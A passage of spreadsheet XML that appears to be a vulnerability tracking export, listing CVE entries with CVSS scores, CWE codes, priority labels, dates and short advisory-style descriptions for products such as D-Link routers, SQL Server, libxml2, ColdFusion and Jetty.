r="O292" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P292" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q292" s="5" t="inlineStr" /><c r="R292" s="5" t="inlineStr"><is><t>CWE-119, CWE-121</t></is></c><c r="S292" s="5" t="inlineStr"><is><t>A flaw has been found in D-Link DIR-895L A1_102b07. This impacts the function sendOffer/sendACK of the file udhcpcd/serverpacket.c of the component udhcpcd. This manipulation causes stack-based buffer overflow. The attack can only be done within the local network. The exploit has been published and may be used.</t></is></c><c r="T292" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86509</t></is></c></row><row r="293"><c r="A293" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B293" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C293" s="5" t="inlineStr"><is><t>CVE-2026-86510</t></is></c><c r="D293" s="5" t="n"><v>8.6</v></c><c r="E293" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F293" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G293" s="5" t="inlineStr" /><c r="H293" s="5" t="n"><v>0.005</v></c><c r="I293" s="5" t="inlineStr" /><c r="J293" s="5" t="inlineStr" /><c r="K293" s="5" t="inlineStr" /><c r="L293" s="5" t="inlineStr" /><c r="M293" s="5" t="inlineStr" /><c r="N293" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P293" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q293" s="5" t="inlineStr" /><c r="R293" s="5" t="inlineStr"><is><t>CWE-119, CWE-787</t></is></c><c r="S293" s="5" t="inlineStr"><is><t>A vulnerability has been found in D-Link DIR-822A A_101. Affected is the function tunnel_set_params of the component L2TP Control Message Parser. Such manipulation leads to out-of-bounds write. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.</t></is></c><c r="T293" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86510</t></is></c></row><row r="294"><c r="A294" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B294" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C294" s="5" t="inlineStr"><is><t>CVE-2026-86712</t></is></c><c r="D294" s="5" t="n"><v>8.6</v></c><c r="E294" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F294" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G294" s="5" t="inlineStr" /><c r="H294" s="5" t="n"><v>0.004</v></c><c r="I294" s="5" t="inlineStr" /><c r="J294" s="5" t="inlineStr" /><c r="K294" s="5" t="inlineStr" /><c r="L294" s="5" t="inlineStr" /><c r="M294" s="5" t="inlineStr" /><c r="N294" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O294" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P294" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q294" s="5" t="inlineStr" /><c r="R294" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S294" s="5" t="inlineStr"><is><t>SiYuan before 3.8.2 trusts the attacker-writable text/siyuan clipboard MIME type and skips sanitization in the paste handler, allowing code execution in the Node-enabled desktop renderer. Attackers can craft malicious web pages that write to the clipboard, and when pasted into SiYuan, injected scripts execute with full Node.js access through the Electron main process.</t></is></c><c r="T294" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86712</t></is></c></row><row r="295"><c r="A295" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B295" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C295" s="5" t="inlineStr"><is><t>CVE-2026-86722</t></is></c><c r="D295" s="5" t="n"><v>8.6</v></c><c r="E295" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F295" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G295" s="5" t="inlineStr" /><c r="H295" s="5" t="n"><v>0.003</v></c><c r="I295" s="5" t="inlineStr" /><c r="J295" s="5" t="inlineStr" /><c r="K295" s="5" t="inlineStr" /><c r="L295" s="5" t="inlineStr" /><c r="M295" s="5" t="inlineStr" /><c r="N295" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O295" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P295" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q295" s="5" t="inlineStr" /><c r="R295" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S295" s="5" t="inlineStr"><is><t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains an authentication bypass vulnerability where sqlDAL caches empty result sets that writeSql never invalidates. Attackers with a valid password can bypass email two-factor authentication on new devices because the confirmation code hash fails to generate from the stale cached empty result.</t></is></c><c r="T295" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86722</t></is></c></row><row r="296"><c r="A296" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B296" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C296" s="5" t="inlineStr"><is><t>CVE-2026-58113</t></is></c><c r="D296" s="5" t="n"><v>8.5</v></c><c r="E296" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F296" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G296" s="5" t="inlineStr" /><c r="H296" s="5" t="n"><v>0.002</v></c><c r="I296" s="5" t="inlineStr" /><c r="J296" s="5" t="inlineStr" /><c r="K296" s="5" t="inlineStr" /><c r="L296" s="5" t="inlineStr" /><c r="M296" s="5" t="inlineStr" /><c r="N296" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O296" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P296" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q296" s="5" t="inlineStr" /><c r="R296" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S296" s="5" t="inlineStr"><is><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is></c><c r="T296" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58113</t></is></c></row><row r="297"><c r="A297" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B297" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C297" s="5" t="inlineStr"><is><t>CVE-2026-67379</t></is></c><c r="D297" s="5" t="n"><v>8.5</v></c><c r="E297" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F297" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G297" s="5" t="inlineStr" /><c r="H297" s="5" t="n"><v>0.006</v></c><c r="I297" s="5" t="inlineStr" /><c r="J297" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K297" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L297" s="5" t="inlineStr" /><c r="M297" s="5" t="inlineStr" /><c r="N297" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O297" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P297" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q297" s="5" t="inlineStr" /><c r="R297" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S297" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T297" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67379</t></is></c></row><row r="298"><c r="A298" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B298" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C298" s="5" t="inlineStr"><is><t>CVE-2026-74860</t></is></c><c r="D298" s="5" t="n"><v>8.5</v></c><c r="E298" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F298" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G298" s="5" t="inlineStr" /><c r="H298" s="5" t="n"><v>0.004</v></c><c r="I298" s="5" t="inlineStr" /><c r="J298" s="5" t="inlineStr" /><c r="K298" s="5" t="inlineStr" /><c r="L298" s="5" t="inlineStr" /><c r="M298" s="5" t="inlineStr" /><c r="N298" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O298" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P298" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q298" s="5" t="inlineStr" /><c r="R298" s="5" t="inlineStr"><is><t>CWE-763</t></is></c><c r="S298" s="5" t="inlineStr"><is><t>A flaw was found in libxml2 with Python bindings enabled. A remote attacker could exploit this vulnerability by providing a specially crafted XML document containing a Document Type Definition (DTD) with enumerated attribute values. This triggers a double-free error in the SAX attributeDecl callback handler, where a string is freed twice. This flaw can lead to a denial of service (DoS) due to a reproducible crash in Python applications using the libxml2 SAX bindings.</t></is></c><c r="T298" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-74860</t></is></c></row><row r="299"><c r="A299" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B299" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C299" s="5" t="inlineStr"><is><t>CVE-2026-75993</t></is></c><c r="D299" s="5" t="n"><v>8.5</v></c><c r="E299" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F299" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G299" s="5" t="inlineStr" /><c r="H299" s="5" t="n"><v>0.004</v></c><c r="I299" s="5" t="inlineStr" /><c r="J299" s="5" t="inlineStr" /><c r="K299" s="5" t="inlineStr" /><c r="L299" s="5" t="inlineStr" /><c r="M299" s="5" t="inlineStr" /><c r="N299" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O299" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P299" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q299" s="5" t="inlineStr" /><c r="R299" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S299" s="5" t="inlineStr"><is><t>ColdFusion is affected by a reflected Cross-Site Scripting (XSS) vulnerability. An attacker could exploit this vulnerability to inject malicious scripts into a web page, potentially gaining elevated access or control over the victim's account or session. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t></is></c><c r="T299" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75993</t></is></c></row><row r="300"><c r="A300" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B300" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C300" s="5" t="inlineStr"><is><t>CVE-2026-76958</t></is></c><c r="D300" s="5" t="n"><v>8.5</v></c><c r="E300" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F300" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G300" s="5" t="inlineStr" /><c r="H300" s="5" t="n"><v>0.002</v></c><c r="I300" s="5" t="inlineStr" /><c r="J300" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K300" s="5" t="inlineStr" /><c r="L300" s="5" t="inlineStr" /><c r="M300" s="5" t="inlineStr" /><c r="N300" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P300" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q300" s="5" t="inlineStr" /><c r="R300" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S300" s="5" t="inlineStr"><is><t>SAP Integration Suite does not sufficiently validate XML documents accepted from untrusted sources in certain internal components. An attacker with low privileges could submit specially crafted XML payloads containing malicious external entity declarations. Successful exploitation could allow the attacker to read sensitive file contents from the server and expose them through monitoring or logging output, resulting in a high impact on confidentiality. It could also lead to resource exhaustion, causing a low impact on availability. There is no impact on integrity.</t></is></c><c r="T300" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t></is></c></row><row r="301"><c r="A301" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B301" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C301" s="5" t="inlineStr"><is><t>CVE-2026-85384</t></is></c><c r="D301" s="5" t="n"><v>8.5</v></c><c r="E301" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F301" s="5" t="inlineStr"><is><t>f23511db-6c3e-4e32-a477-6aa17d310630</t></is></c><c r="G301" s="5" t="inlineStr" /><c r="H301" s="5" t="n"><v>0.002</v></c><c r="I301" s="5" t="inlineStr" /><c r="J301" s="5" t="inlineStr" /><c r="K301" s="5" t="inlineStr" /><c r="L301" s="5" t="inlineStr" /><c r="M301" s="5" t="inlineStr" /><c r="N301" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O301" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P301" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q301" s="5" t="inlineStr" /><c r="R301" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S301" s="5" t="inlineStr"><is><t>A stack-based buffer overflow vulnerability exists in the httpd component of RE210 AC750 due to improper bounds checking in the splitString function when processing an uploaded configuration file. An authenticated attacker on the local network can upload a crafted configuration file to trigger the overflow, leading to remote code execution.





Successful exploitation may allow unauthorized access to sensitive information, modification of device configuration and network behavior, or disruption of device availability.</t></is></c><c r="T301" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85384</t></is></c></row><row r="302"><c r="A302" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B302" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C302" s="5" t="inlineStr"><is><t>CVE-2026-69479</t></is></c><c r="D302" s="5" t="n"><v>8.4</v></c><c r="E302" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F302" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G302" s="5" t="inlineStr" /><c r="H302" s="5" t="n"><v>0.003</v></c><c r="I302" s="5" t="inlineStr" /><c r="J302" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K30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02" s="5" t="inlineStr" /><c r="M302" s="5" t="inlineStr" /><c r="N302" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O302" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P302" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q302" s="5" t="inlineStr" /><c r="R302" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S302" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T302" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t></is></c></row><row r="303"><c r="A303" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B303" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C303" s="5" t="inlineStr"><is><t>CVE-2026-69638</t></is></c><c r="D303" s="5" t="n"><v>8.4</v></c><c r="E303" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F303" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G303" s="5" t="inlineStr" /><c r="H303" s="5" t="n"><v>0.003</v></c><c r="I303" s="5" t="inlineStr" /><c r="J303" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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03" s="5" t="inlineStr" /><c r="M303" s="5" t="inlineStr" /><c r="N303" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O303" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P303" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q303" s="5" t="inlineStr" /><c r="R303" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S303" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T303" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t></is></c></row><row r="304"><c r="A304" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B304" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C304" s="5" t="inlineStr"><is><t>CVE-2026-75999</t></is></c><c r="D304" s="5" t="n"><v>8.4</v></c><c r="E304" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F304" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G304" s="5" t="inlineStr" /><c r="H304" s="5" t="n"><v>0.004</v></c><c r="I304" s="5" t="inlineStr" /><c r="J304" s="5" t="inlineStr" /><c r="K304" s="5" t="inlineStr" /><c r="L304" s="5" t="inlineStr" /><c r="M304" s="5" t="inlineStr" /><c r="N304" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O304" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P304" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q304" s="5" t="inlineStr" /><c r="R304" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S304" s="5" t="inlineStr"><is><t>ColdFusion is affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. The vulnerable component is restricted to an administrative network zone by default. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t></is></c><c r="T304" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75999</t></is></c></row><row r="305"><c r="A305" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B305" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C305" s="5" t="inlineStr"><is><t>CVE-2026-77827</t></is></c><c r="D305" s="5" t="n"><v>8.4</v></c><c r="E305" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F305" s="5" t="inlineStr"><is><t>9119a7d8-5eab-497f-8521-727c672e3725</t></is></c><c r="G305" s="5" t="inlineStr" /><c r="H305" s="5" t="n"><v>0.002</v></c><c r="I305" s="5" t="inlineStr" /><c r="J305" s="5" t="inlineStr" /><c r="K305" s="5" t="inlineStr" /><c r="L305" s="5" t="inlineStr" /><c r="M305" s="5" t="inlineStr" /><c r="N305" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O305" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P305" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q305" s="5" t="inlineStr" /><c r="R305" s="5" t="inlineStr"><is><t>CWE-428</t></is></c><c r="S305" s="5" t="inlineStr"><is><t>Maono Link 3.8.13 MaonoAiServices Windows service allows local privilege escalation for a standard user account via improper write privileges in 'C:\ProgramData\Maono'. Fixed in 4.0.80.</t></is></c><c r="T305" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77827</t></is></c></row><row r="306"><c r="A306" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B306" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C306" s="5" t="inlineStr"><is><t>CVE-2026-86819</t></is></c><c r="D306" s="5" t="n"><v>8.4</v></c><c r="E306" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F306" s="5" t="inlineStr"><is><t>9119a7d8-5eab-497f-8521-727c672e3725</t></is></c><c r="G306" s="5" t="inlineStr" /><c r="H306" s="5" t="n"><v>0.001</v></c><c r="I306" s="5" t="inlineStr" /><c r="J306" s="5" t="inlineStr" /><c r="K306" s="5" t="inlineStr" /><c r="L306" s="5" t="inlineStr" /><c r="M306" s="5" t="inlineStr" /><c r="N306" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O306" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P306" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q306" s="5" t="inlineStr" /><c r="R306" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S306" s="5" t="inlineStr"><is><t>Waves Central for macOS contains a local privilege escalation in the privileged helper service. The helper authorizes connecting XPC clients by comparing the caller's code-signing certificate chain for equality with its own, rather than validating the caller against a pinned code requirement (application identifier and Team ID). A local, authenticated user can execute code within the vendor-signed process, satisfy the helper's client check, and cause the helper to execute a script with root privileges. Fixed in 17.0.</t></is></c><c r="T306" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86819</t></is></c></row><row r="307"><c r="A307" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B307" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C307" s="5" t="inlineStr"><is><t>CVE-2026-19203</t></is></c><c r="D307" s="5" t="n"><v>8.300000000000001</v></c><c r="E307" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F307" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G307" s="5" t="inlineStr" /><c r="H307" s="5" t="n"><v>0.003</v></c><c r="I307" s="5" t="inlineStr" /><c r="J307" s="5" t="inlineStr" /><c r="K307" s="5" t="inlineStr" /><c r="L307" s="5" t="inlineStr" /><c r="M307" s="5" t="inlineStr" /><c r="N307" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q307" s="5" t="inlineStr" /><c r="R307" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="S307" s="5" t="inlineStr"><is><t>A client may issue specially crafted HTTP/1.1 chunked requests to a Jetty server that cause Jetty and an intermediary proxy to interpret different request boundaries, potentially resulting in HTTP request smuggling.




This is caused by Jetty accepting a lone LF character as a terminator in parts of chunked request parsing. Depending on the Jetty version and configured HTTP compliance mode, this may occur in chunk extensions, chunk data termination, or trailer termination.</t></is></c><c r="T307" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19203</t></is></c></row><row r="308"><c r="A308" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B308" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C308" s="5" t="inlineStr"><is><t>CVE-2026-69646</t></is></c><c r="D308" s="5" t="n"><v>8.300000000000001</v></c><c r="E308" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F308" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G308" s="5" t="inlineStr" /><c r="H308" s="5" t="n"><v>0.002</v></c><c r="I308" s="5" t="inlineStr" /><c r="J308" s="5" t="inlineStr" /><c r="K308" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L308" s="5" t="inlineStr" /><c r="M308" s="5" t="inlineStr" /><c r="N308" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O308" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P308" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q308" s="5" t="inlineStr" /><c r="R308" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S308" s="5" t="inlineStr"><is><t>Improper verification of cryptographic signature in Skype for Business allows an unauthorized attacker to perform spoofing over an adjacent network.</t></is></c><c r="T308" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69646</t></is></c></row><row r="309"><c r="A309" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B309" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C309" s="5" t="inlineStr"><is><t>CVE-2026-81821</t></is></c><c r="D309" s="5" t="n"><v>8.300000000000001</v></c><c r="E309" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F309" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G309" s="5" t="inlineStr" /><c r="H309" s="5" t="n"><v>0.001</v></c><c r="I309" s="5" t="inlineStr" /><c r="J309" s="5" t="inlineStr" /><c r="K309" s="5" t="inlineStr" /><c r="L309" s="5" t="inlineStr" /><c r="M309" s="5" t="inlineStr" /><c r="N309" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O309" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P309" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q309" s="5" t="inlineStr" /><c r="R309" s="5" t="inlineStr"><is><t>CWE-321</t></is></c><c r="S309" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to decrypt and view sensitive information.</t></is></c><c r="T309" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81821</t></is></c></row><row r="310"><c r="A310" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B310" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C310" s="5" t="inlineStr"><is><t>CVE-2026-81822</t></is></c><c r="D310" s="5" t="n"><v>8.300000000000001</v></c><c r="E310" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F310" s="5" t="inlineStr"><is><t>ics-cert@hq.dhs.gov</t></is></c><c r="G310" s="5" t="inlineStr" /><c r="H310" s="5" t="n"><v>0.001</v></c><c r="I310" s="5" t="inlineStr" /><c r="J310" s="5" t="inlineStr" /><c r="K310" s="5" t="inlineStr" /><c r="L310" s="5" t="inlineStr" /><c r="M310" s="5" t="inlineStr" /><c r="N310" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O310" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P310" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q310" s="5" t="inlineStr" /><c r="R310" s="5" t="inlineStr"><is><t>CWE-327</t></is></c><c r="S310" s="5" t="inlineStr"><is><t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to reverse engineer PIMBoards users’ app-native passwords through computational brute-forcing of weak hashes, potentially allowing elevation to a PIMBoards administrator user.</t></is></c><c r="T310" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81822</t></is></c></row><row r="311"><c r="A311" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B311" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C311" s="5" t="inlineStr"><is><t>CVE-2026-69846</t></is></c><c r="D311" s="5" t="n"><v>8.199999999999999</v></c><c r="E311" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F311" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G311" s="5" t="inlineStr" /><c r="H311" s="5" t="n"><v>0.003</v></c><c r="I311" s="5" t="inlineStr" /><c r="J311" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K31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11" s="5" t="inlineStr" /><c r="M311" s="5" t="inlineStr" /><c r="N311" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O311" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P311" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q311" s="5" t="inlineStr" /><c r="R311" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S311" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T311" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69846</t></is></c></row><row r="312"><c r="A312" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B312" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C312" s="5" t="inlineStr"><is><t>CVE-2026-69906</t></is></c><c r="D312" s="5" t="n"><v>8.199999999999999</v></c><c r="E312" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F312" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G312" s="5" t="inlineStr" /><c r="H312" s="5" t="n"><v>0.003</v></c><c r="I312" s="5" t="inlineStr" /><c r="J312" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K31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12" s="5" t="inlineStr" /><c r="M312" s="5" t="inlineStr" /><c r="N312" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O312" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P312" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q312" s="5" t="inlineStr" /><c r="R312" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S312" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T312" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t></is></c></row><row r="313"><c r="A313" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B313" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C313" s="5" t="inlineStr"><is><t>CVE-2026-72958</t></is></c><c r="D313" s="5" t="n"><v>8.199999999999999</v></c><c r="E313" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F313" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G313" s="5" t="inlineStr" /><c r="H313" s="5" t="n"><v>0.003</v></c><c r="I313" s="5" t="inlineStr" /><c r="J313" s="5" t="inlineStr" /><c r="K313" s="5" t="inlineStr" /><c r="L313" s="5" t="inlineStr" /><c r="M313" s="5" t="inlineStr" /><c r="N313" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O313" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P313" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q313" s="5" t="inlineStr" /><c r="R313" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S313" s="5" t="inlineStr"><is><t>Double free 